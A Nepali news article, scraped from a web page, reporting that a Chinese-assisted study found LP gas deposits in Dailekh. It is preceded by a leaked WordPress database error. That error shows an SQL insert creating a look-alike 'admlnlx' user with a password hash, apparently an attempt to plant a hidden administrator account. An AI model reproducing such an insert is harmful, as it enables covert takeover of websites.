WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BT6XUAPaQ5dfrr4IatWIdJI2G51jj1.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 15:32:39', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर २६–
नेपालमा पनि लिक्विफाइड पेट्रोलियम (एलपी) ग्यासको खानी रहेको पुष्टि भएको छ । दैलेखको श्रीस्थानलगायतका क्षेत्रमा पेट्रोलियम ग्यास उत्खननको सम्भावना रहेको चिनियाँ सहयोगमा गरिएको सरकारी स्तरको अध्ययनले देखाएको हो ।
सरकारले चीनबाट ल्याएको प्राविधिक तथा वैज्ञानिक सम्मिलित टोलीको सहयोगमा दैलेख लगायतका क्षेत्रमा पेट्रोलियम ग्यासको खानी रहेको भन्दै प्रारम्भिक रिपोर्ट बनाएको छ । गत वर्ष फिल्डमा खटिएको टोलीले चीन सरकारलाई बुझाएको रिपोर्ट भर्खरै नेपालमा आइपुगेको छ र यसले सरकारलाई उत्साहित गराएको छ ।
रिपोर्टअनुसार दैलेखको ग्यास काठमाडौंको जस्तो प्राकृतिक मिथेन ग्यास होइन । त्यहाँबाट उत्खनन् हुने ग्यास सिलिन्डरमा भरेर बिक्री गर्न योग्य छ । काठमाडौंको ग्यास भने पाइपबाट मात्रै भान्सामा पुर्याउन सकिने किसिमको हो ।
नेपालमा पेट्रोलियम तेलको सम्भावना रहेको पुष्टी यसअघि नै भएपनि एलपी ग्यासको बारेमा भने अहिलेसम्म औपचारिक अध्ययन हुन सकेको थिए ।